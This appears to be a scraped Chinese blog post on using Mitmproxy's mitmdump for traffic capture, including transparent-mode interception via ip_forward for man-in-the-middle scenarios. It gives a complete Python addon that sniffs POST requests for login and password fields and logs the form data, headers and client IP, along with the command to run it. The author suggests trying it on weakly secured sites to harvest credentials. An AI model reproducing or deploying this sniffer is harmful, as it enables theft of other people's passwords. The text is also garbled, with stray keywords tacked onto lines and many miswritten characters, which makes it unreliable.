好久沒有寫文章了,一是沒空,二是幾乎忘了還有這回事。這篇應該是年前的最後一發吧!那麼今天就來聊一聊我最近關於網絡抓包的一些實踐(其實我對網絡安全領域知之甚少)。固然,你們最熟知的工具多是 Wireshark,它的功能十分強大。不過它大概不支持熱插拔腳本,也就沒辦法實現徹底自有掌控的抓包。因而不就以後,Mitmproxy 這貨進入了個人視線,用它能夠方便的添加自定義抓取邏輯的 Python 腳本,能夠說很是容易擴展,完美的解決了個人需求。這也是寫完 Keykee 以後,再一次將這一傻式編程語言應用到生產實踐中。前端
忽然想起了本身入行這兩年的一個感悟:python
程序員有時候應該感謝給本身提需求的人。git
Mitmdump 是 Mitmproxy 的一個分支,它就是實現根據自定義的腳本進行 dump 的核心工具。若是就是在本身機器上玩一玩的話,使用常規模式 (Regular Mode) 便可。關於 Mitmproxy 這幾種模式的詳細介紹能夠看官方文檔,這是常規模式的原理圖:程序員
若是有中間人攻擊的因素在裏面的話須要配合 Linux 的 ip_forward,而且使用 Mitmdump 的透明模式( Transparent Mode),它對客戶端來講是不可見的:編程
一般狀況下,常規和透明這兩種模式能夠知足大部分的實驗需求。瀏覽器
Mitmdump 能夠經過 pip 安裝:安全
$ pip install mitmproxy
複製代碼
安裝完以後就能夠在任何地方使用 mitmdump
命令操做了。bash
若是須要抓取 https 請求的話,須要在系統中導入 Mitmproxy 的根證書,若是隻在某個瀏覽器中實驗的的話,也能夠直接在瀏覽器中導入。證書的默認位置在 ~/.mitmproxy
目錄下。網絡
而後設置系統的網絡代理,根據須要設置「對全部協議使用相同代理」。代理 ip 爲 127.0.0.1,代理端口爲 8080。編程語言
這樣,準備工做就作好了。
此次嘗試編寫一個密碼嗅探的腳本,前面提到了,它的擴展性很是強!!!因此我這裏就拋磚引玉了。
import logging
from mitmproxy import http
password_key = ["password", "pwd", "pass", "passwd", "mm", "passport", "auth", "key", "mima"]
form_login_key = ["check", "login", "verify", "account", "logon", "signin", "denglu"]
class Sniffer:
def request(self, flow: http.HTTPFlow):
request = flow.request
url = request.pretty_url
form_url = str(request.urlencoded_form)
if request.method == 'POST':
if self.any_match(form_login_key, url) or self.any_match(password_key, form_url):
self.resolve(flow)
def any_match(self, list, str: str):
lower_str = str.lower()
for i in list:
if i in lower_str:
return True
return False
def resolve(self, flow: http.HTTPFlow):
request = flow.request
url = request.url
_from = str(flow.client_conn.ip_address)
url_form = str(request.urlencoded_form)
header = str(request.headers)
logging.info("url: %s \nheader: %s \nform: %s \nip_from: %s", url, header, url_form, _from)
複製代碼
Mitmdump 會建立一個 Sniffer
類的實例,並調用 request(flow)
方法,它能夠一次插入多個這樣的 class,只須要提供一個統一的入口便可:
from sniffer import Sniffer
addons = [
Sniffer()
# YourSniffer()
# ...
]
複製代碼
最後,執行mitmdump
命令開始抓包:
$ mitmdump -q -s addons.py --set body-size-limit=10k "~m post"
複製代碼
啓動以後訪問一個本身認爲安全性相對較差的站點,進行用戶登陸的操做,而後控制檯裏出現了用戶名密碼等信息,若是通過加密了,找到這個頁面的前端代碼研究一下加密方式,安全性較差的站點很容易就能搞明白。
最後,歡迎來個人擺碼王子的小屋作客!
各位朋友,新春愉快 : )